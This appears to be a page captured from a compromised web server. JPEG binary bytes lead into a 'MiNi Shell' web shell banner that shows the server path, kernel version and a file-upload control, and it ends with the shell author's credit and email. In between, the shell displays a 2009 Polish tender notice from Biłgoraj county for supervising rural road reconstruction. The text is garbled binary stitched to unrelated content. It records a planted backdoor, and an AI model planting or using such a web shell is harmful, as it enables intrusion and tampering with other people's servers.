JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091012/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091012/175885-N-2009.html

<p class="kh_header"><b>Biłgoraj: Pełnienie funkcji inspektora nadzoru nad zagospodarowaniem poscaleniowym polegającym na przebudowie dróg lokalnych i dojazdowych do gruntów rolnych na terenie obrębu Potok Górny gmina Potok Górny w ramach projektu Program Rozwoju Obszarów Wiejskich na lata 2007 - 2013
Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów</b><br>
<b>Numer ogłoszenia: 175885 - 2009; data zamieszczenia: 12.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Skarb Państwa reprezentowany przez Starostę Biłgorajskiego , ul. Tadeusza Kościuszki 87, 23-400 Biłgoraj, woj. lubelskie, tel. 0 81 688 2000, faks 0 81 688 2009.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bilgorajski.netbip.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> zamawiający nie zamierza ustanawiać dynamicznego systemu zakupów</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru nad zagospodarowaniem poscaleniowym polegającym na przebudowie dróg lokalnych i dojazdowych do gruntów rolnych na terenie obrębu Potok Górny gmina Potok Górny w ramach projektu Program Rozwoju Obszarów Wiejskich na lata 2007 - 2013
Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inspektora nadzoru nad zagospodarowaniem poscaleniowym polegającym na przebudowie dróg lokalnych i dojazdowych do gruntów rolnych na terenie obrębu Potok Górny gmina Potok Górny w ramach projektu Program Rozwoju Obszarów Wiejskich na lata 2007 - 2013
Poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów
Projektowane zagospodarowanie terenu
Przy skrzyżowaniach dróg lokalnych i dojazdowych z drogami lokalnymi i dojazdowymi, oraz z drogami publicznymi  projektuje się wyokrąglenie krawędzi jezdni łukami o promieniu R=6,00 m. Zaprojektowano skrzyżowania typu prostego.
Przekroje normalne
Zaprojektowane odcinki dróg lokalnych i dojazdowych do gruntów rolnych o łącznej długości 43124m posiadają w przekroju poprzecznym jezdnię szerokości 3,50 m o nawierzchni z kruszywa łamanego lub żwiru ze spadkiem daszkowym i = 3,0 %, oraz płyt żelbetowych wielootworowych IOMB grubości 12 cm ze spadkiem daszkowym i = 2,0 %. Przyjęto pobocza gruntowe nieutwardzone szerokości 2 x 0,75 m ze spadkiem jednostronnym i = 8 %.
Zaprojektowano trzy przekroje normalne różniące się rodzajem i grubością warstw konstrukcyjnych. 
Dla dróg lokalnych od Nr L1 do L20 o łącznej długości 27 529 m i szerokości jezdni 3,50 m projektuje się następującą konstrukcję nawierzchni: -   3 cm - podbudowa zasadnicza z tłucznia kamiennego, warstwa górna, wg. PN-B-11112  z 1996 r. - 12 cm - podbudowa zasadnicza z kruszywa łamanego (z przekruszonych konstrukcji betonowych) stabilizowanego mechanicznie, warstwa dolna, wg. PN-S-06102  z 1997 r.
 - 10 cm 	- warstwa odsączająca z piasku średnio lub drobnoziarnistego wg. PN-B-11113  z 1996 r.
Dla dróg dojazdowych  Nr D 1, D 2, D 3, D 10, D 11, D 13, D 15, D 16, D 18, D 20, D 25
o łącznej długości 10868 m i szerokości jezdni  3,50 m projektuje się następującą konstrukcję nawierzchni:
 - 15 cm 	- nawierzchnia żwirowa z kruszywa naturalnego - mieszanki żwirowej wg. PN-B-11111 i PN-B-11113 z 1996 r. 
- 10 cm 	- warstwa odsączająca z piasku średnio lub drobnoziarnistego wg. PN-B-11113  z 1996 r.
Dla dróg dojazdowych od Nr D 28 do Nr D 30 o łącznej długości 4 727 m i szerokości jezdni  3,50 m projektuje się następującą konstrukcję nawierzchni:
- 12 cm 	- nawierzchnia z płyt żelbetowych wielootworowych - IOMB wg. BN-80/6775-03/02 
- 10 cm 	- warstwa odsączająca z piasku średnio lub drobnoziarnistego wg. PN-B-11113 z 1996 r.
Nadzór inwestorski obejmuje: 
1) wydawanie poleceń i instrukcji Wykonawcy celem prawidłowego i rzetelnego wykonania przedmiotu umowy, 
2) prawo wstrzymania robót jeśli jest to konieczne dla ich prawidłowego wykonania oraz w przypadku, gdy Wykonawca nie wypełnia swych obowiązków z należytą starannością, wiedzą techniczną i postanowieniami umowy,
3) kontrole jakości używanych materiałów zgodnie z prawem, żądanie dodatkowych badań jakościowych, a w szczególności obowiązkowy odbiór przedstawionych przez Wykonawcę certyfikatów i deklaracji zgodności materiałów przed ich wbudowaniem,
4) żądanie usunięcia przez Wykonawcę ujawnionych wad w jakości prac oraz wnioskowanie o potrącenie z wynagrodzenia Wykonawcy kar umownych w przypadku nie usunięcia tych wad,
5) dokonywanie odbiorów częściowych, zwłaszcza prac zanikających i ulegających zakryciu,
6) udział w czynnościach odbioru częściowego, końcowego, i pogwarancyjnego. W ramach tych czynności Inspektor zobowiązany jest do:
a) stwierdzenia gotowości do odbioru,
b) przekazania Zamawiającemu protokołów odbioru oraz dokumentacji powykonawczej,
7) dbanie o interesy Zamawiającego oraz podejmowanie czynności zapewniających techniczną poprawność realizowanej inwestycji,
8) pobyt na terenie realizowanej inwestycji oraz bieżące reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z przepisami prawa, umowy oraz dokumentacji technicznej,
9) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,
10) sprawdzanie obmiarów robót i kosztorysów powykonawczych oraz potwierdzenie wykonanych robót jako podstawy do zapłaty wynagrodzenia Wykonawcy robót,
11) kontrolowanie rozliczeń zadania, w tym zużycia materiałów i weryfikacji kosztów i sprawdzanie faktur,
12) sygnalizowanie Zamawiającemu o wszelkich okolicznościach mogących mieć wpływ na terminowość oraz poprawność wykonywanych robót budowlanych oraz o wystąpieniu okoliczności nieprzewidzianych w dokumentacji projektowej,
13) udział w naradach technicznych,
14) reprezentowanie interesów Zamawiającego w procesie budowlanym.
15) Inspektor zobowiązuje się do dokonania czynności wymienionych w § 1 ust. 2, z należytą starannością w oparciu o aktualne unormowania prawne wynikające z zapisów art. 25 i 26 ustawy z dnia 07.07.1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 ze. zm.), zgodnie z obowiązującymi standardami, zasadami sztuki oraz etyką zawodową.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wpłaty wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się wykonawcy spełniający warunki określone w art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 Prawo zamówień publicznych,  zgodnie z którymi:
1. posiadają uprawnienia do wykonywania określonej działalności lub czynności jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia;
Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że:
dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia -  minimum 1 osobę posiadającą uprawnienia do kierowania robotami budowlanymi w specjalności drogowej oraz przynależnej do właściwej Izby Samorządu Zawodowego
3. znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4. nie podlegają wykluczeniu z postępowania o udzielenie zamówienia z art. 24;

Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w oparciu o regułę spełnia /nie spełnia na podstawie wymaganych oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. oświadczenie o spełnieniu warunków udziału w postępowaniu zgodnie z art. 44 ustawy. 
2. W celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu z art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych Zamawiający żąda, następujących dokumentów
a) aktualnego odpisu z właściwego rejestru, albo aktualnego zaświadczenia  o wpisie do ewidencji działalności gospodarczej jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
b) Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 2 
składa dokumenty określone w § 2 Rozporządzenia Rady Ministrów z dnia 19 maja 2006r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz. U. z 2006r. Nr 87, poz. 605)
3. W celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia , Zamawiający żąda następujących dokumentów:
a) wykazu osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych a także zakresu wykonywanych przez nie czynności.
b) pisemnego zobowiązania innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia, jeżeli w wykazie, o którym mowa w ppkt. a) wykonawca wskazał osoby, którymi będzie dysponował
c) stwierdzających, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, tj. uprawnienia do kierowania robotami budowlanymi w specjalności drogowej  wraz z zaświadczeniem o przynależności do właściwej Izby Samorządu Zawodowego
4. W przypadku oferty składanej przez Wykonawców występujących wspólnie, każdy z członków konsorcjum załącza do oferty dokumenty o których mowa w pkt. 2. Natomiast w zakresie dokumentów określonych w pkt. 3 Zamawiający uzna za spełniony warunek w przypadku gdy przynajmniej jeden z członków konsorcjum będzie spełniał wymagane warunki, bądź warunki te będą spełniali łącznie.
5. Dokumenty sporządzane w języku obcym są składane wraz z tłumaczeniem na język polski poświadczonym przez wykonawcę..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bilgorajski.netbip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Biłgoraju ul. Tadeusza Kościuszki 87, 23-400 Biłgoraj, pok. 101.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2009 godzina 11:00, miejsce: Starostwo Powiatowe w Biłgoraju ul. Tadeusza Kościuszki 87, 23-400 Biłgoraj, pok. 103 sekretariat Starosty.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Rozwoju Obszarów Wiejskich na lata 2007-2013 poprawianie i rozwijanie infrastruktury związanej z rozwojem i dostosowywaniem rolnictwa i leśnictwa przez scalanie gruntów..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> pełnienie funkcji inspektora nadzoru nad drogami lokalnymi od L1 do L20.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla dróg lokalnych od Nr L1 do L20 o łącznej długości 27 529 m i szerokości jezdni 3,50 m projektuje się następującą konstrukcję nawierzchni: 
- 3 cm - podbudowa zasadnicza z tłucznia kamiennego, warstwa górna, wg. PN-B-11112  z 1996 r. 
- 12 cm - podbudowa zasadnicza z kruszywa łamanego (z przekruszonych konstrukcji betonowych) stabilizowanego mechanicznie, warstwa dolna, wg. PN-S-06102  z 1997 r.
- 10 cm 	- warstwa odsączająca z piasku średnio lub drobnoziarnistego wg. PN-B-11113  z 1996 r.
Nadzór inwestorski obejmuje: 
1) wydawanie poleceń i instrukcji Wykonawcy celem prawidłowego i rzetelnego wykonania przedmiotu umowy, 
2) prawo wstrzymania robót jeśli jest to konieczne dla ich prawidłowego wykonania oraz w przypadku, gdy Wykonawca nie wypełnia swych obowiązków z należytą starannością, wiedzą techniczną i postanowieniami umowy,
3) kontrole jakości używanych materiałów zgodnie z prawem, żądanie dodatkowych badań jakościowych, a w szczególności obowiązkowy odbiór przedstawionych przez Wykonawcę certyfikatów i deklaracji zgodności materiałów przed ich wbudowaniem,
4) żądanie usunięcia przez Wykonawcę ujawnionych wad w jakości prac oraz wnioskowanie o potrącenie z wynagrodzenia Wykonawcy kar umownych w przypadku nie usunięcia tych wad,
5) dokonywanie odbiorów częściowych, zwłaszcza prac zanikających i ulegających zakryciu,
6) udział w czynnościach odbioru częściowego, końcowego, i pogwarancyjnego. W ramach tych czynności Inspektor zobowiązany jest do:
a)	stwierdzenia gotowości do odbioru,
b)	przekazania Zamawiającemu protokołów odbioru oraz dokumentacji powykonawczej,
7)	dbanie o interesy Zamawiającego oraz podejmowanie czynności zapewniających techniczną poprawność realizowanej inwestycji,
8)	pobyt na terenie realizowanej inwestycji oraz bieżące reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z przepisami prawa, umowy oraz dokumentacji technicznej,
9)	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,
10)	sprawdzanie obmiarów robót i kosztorysów powykonawczych oraz potwierdzenie wykonanych robót jako podstawy do zapłaty wynagrodzenia Wykonawcy robót,
11)	kontrolowanie rozliczeń zadania, w tym zużycia materiałów i weryfikacji kosztów i sprawdzanie faktur,
12)	sygnalizowanie Zamawiającemu o wszelkich okolicznościach mogących mieć wpływ na terminowość oraz poprawność wykonywanych robót budowlanych oraz o wystąpieniu okoliczności nieprzewidzianych w dokumentacji projektowej,
13)	udział w naradach technicznych,
14)	reprezentowanie interesów Zamawiającego w procesie budowlanym.
15)	Inspektor zobowiązuje się do dokonania czynności wymienionych w § 1 ust. 2, z należytą starannością w oparciu o aktualne unormowania prawne wynikające z zapisów art. 25 i 26 ustawy z dnia 07.07.1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 ze. zm.), zgodnie z obowiązującymi standardami, zasadami sztuki oraz etyką zawodową..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> pełnienie funkcji inspektora nadzoru nad drogami dojazdowymi D 1, D 2, D 3, D 10, D 11, D 13, D 15, D 16, D 18, D 20, D 25,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla dróg dojazdowych  Nr D 1, D 2, D 3, D 10, D 11, D 13, D 15, D 16, D 18, D 20, D 25 o łącznej długości 10868 m i szerokości jezdni  3,50 m projektuje się następującą konstrukcję nawierzchni:
- 15 cm 	- nawierzchnia żwirowa z kruszywa naturalnego - mieszanki żwirowej wg. PN-B-11111 i PN-B-11113 z 1996 r. 
- 10 cm 	- warstwa odsączająca z piasku średnio lub drobnoziarnistego wg. PN-B-11113  z 1996 r.
Nadzór inwestorski obejmuje: 
1) wydawanie poleceń i instrukcji Wykonawcy celem prawidłowego i rzetelnego wykonania przedmiotu umowy, 
2) prawo wstrzymania robót jeśli jest to konieczne dla ich prawidłowego wykonania oraz w przypadku, gdy Wykonawca nie wypełnia swych obowiązków z należytą starannością, wiedzą techniczną i postanowieniami umowy,
3) kontrole jakości używanych materiałów zgodnie z prawem, żądanie dodatkowych badań jakościowych, a w szczególności obowiązkowy odbiór przedstawionych przez Wykonawcę certyfikatów i deklaracji zgodności materiałów przed ich wbudowaniem,
4) żądanie usunięcia przez Wykonawcę ujawnionych wad w jakości prac oraz wnioskowanie o potrącenie z wynagrodzenia Wykonawcy kar umownych w przypadku nie usunięcia tych wad,
5) dokonywanie odbiorów częściowych, zwłaszcza prac zanikających i ulegających zakryciu,
6) udział w czynnościach odbioru częściowego, końcowego, i pogwarancyjnego. W ramach tych czynności Inspektor zobowiązany jest do:
a) stwierdzenia gotowości do odbioru,
b) przekazania Zamawiającemu protokołów odbioru oraz dokumentacji powykonawczej,
7) dbanie o interesy Zamawiającego oraz podejmowanie czynności zapewniających techniczną poprawność realizowanej inwestycji,
8) pobyt na terenie realizowanej inwestycji oraz bieżące reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z przepisami prawa, umowy oraz dokumentacji technicznej,
9) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,
10) sprawdzanie obmiarów robót i kosztorysów powykonawczych oraz potwierdzenie wykonanych robót jako podstawy do zapłaty wynagrodzenia Wykonawcy robót,
11) kontrolowanie rozliczeń zadania, w tym zużycia materiałów i weryfikacji kosztów i sprawdzanie faktur,
12) sygnalizowanie Zamawiającemu o wszelkich okolicznościach mogących mieć wpływ na terminowość oraz poprawność wykonywanych robót budowlanych oraz o wystąpieniu okoliczności nieprzewidzianych w dokumentacji projektowej,
13) udział w naradach technicznych,
14) reprezentowanie interesów Zamawiającego w procesie budowlanym.
15) Inspektor zobowiązuje się do dokonania czynności wymienionych w § 1 ust. 2, z należytą starannością w oparciu o aktualne unormowania prawne wynikające z zapisów art. 25 i 26 ustawy z dnia 07.07.1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 ze. zm.), zgodnie z obowiązującymi standardami, zasadami sztuki oraz etyką zawodową..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> pełnienie funkcji inspektora nadzoru nad drogami dojazdowymi D28-D30.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dla dróg dojazdowych od Nr D 28 do Nr D 30 o łącznej długości 4 727 m i szerokości jezdni  3,50 m projektuje się następującą konstrukcję nawierzchni:
 - 12 cm 	- nawierzchnia z płyt żelbetowych wielootworowych - IOMB wg. BN-80/6775-03/02 
- 10 cm 	- warstwa odsączająca z piasku średnio lub drobnoziarnistego wg. PN-B-11113 z 1996 r.
Nadzór inwestorski obejmuje: 
1) wydawanie poleceń i instrukcji Wykonawcy celem prawidłowego i rzetelnego wykonania przedmiotu umowy, 
2) prawo wstrzymania robót jeśli jest to konieczne dla ich prawidłowego wykonania oraz w przypadku, gdy Wykonawca nie wypełnia swych obowiązków z należytą starannością, wiedzą techniczną i postanowieniami umowy,
3) kontrole jakości używanych materiałów zgodnie z prawem, żądanie dodatkowych badań jakościowych, a w szczególności obowiązkowy odbiór przedstawionych przez Wykonawcę certyfikatów i deklaracji zgodności materiałów przed ich wbudowaniem,
4) żądanie usunięcia przez Wykonawcę ujawnionych wad w jakości prac oraz wnioskowanie o potrącenie z wynagrodzenia Wykonawcy kar umownych w przypadku nie usunięcia tych wad,
5) dokonywanie odbiorów częściowych, zwłaszcza prac zanikających i ulegających zakryciu,
6) udział w czynnościach odbioru częściowego, końcowego, i pogwarancyjnego. W ramach tych czynności Inspektor zobowiązany jest do:
a) stwierdzenia gotowości do odbioru,
b) przekazania Zamawiającemu protokołów odbioru oraz dokumentacji powykonawczej,
7) dbanie o interesy Zamawiającego oraz podejmowanie czynności zapewniających techniczną poprawność realizowanej inwestycji,
8) pobyt na terenie realizowanej inwestycji oraz bieżące reprezentowanie Zamawiającego na budowie poprzez sprawowanie kontroli zgodności jej realizacji z przepisami prawa, umowy oraz dokumentacji technicznej,
9) potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,
10) sprawdzanie obmiarów robót i kosztorysów powykonawczych oraz potwierdzenie wykonanych robót jako podstawy do zapłaty wynagrodzenia Wykonawcy robót,
11) kontrolowanie rozliczeń zadania, w tym zużycia materiałów i weryfikacji kosztów i sprawdzanie faktur,
12) sygnalizowanie Zamawiającemu o wszelkich okolicznościach mogących mieć wpływ na terminowość oraz poprawność wykonywanych robót budowlanych oraz o wystąpieniu okoliczności nieprzewidzianych w dokumentacji projektowej,
13) udział w naradach technicznych,
14) reprezentowanie interesów Zamawiającego w procesie budowlanym.
15) Inspektor zobowiązuje się do dokonania czynności wymienionych w § 1 ust. 2, z należytą starannością w oparciu o aktualne unormowania prawne wynikające z zapisów art. 25 i 26 ustawy z dnia 07.07.1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. Nr 156 poz. 1118 ze. zm.), zgodnie z obowiązującymi standardami, zasadami sztuki oraz etyką zawodową..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com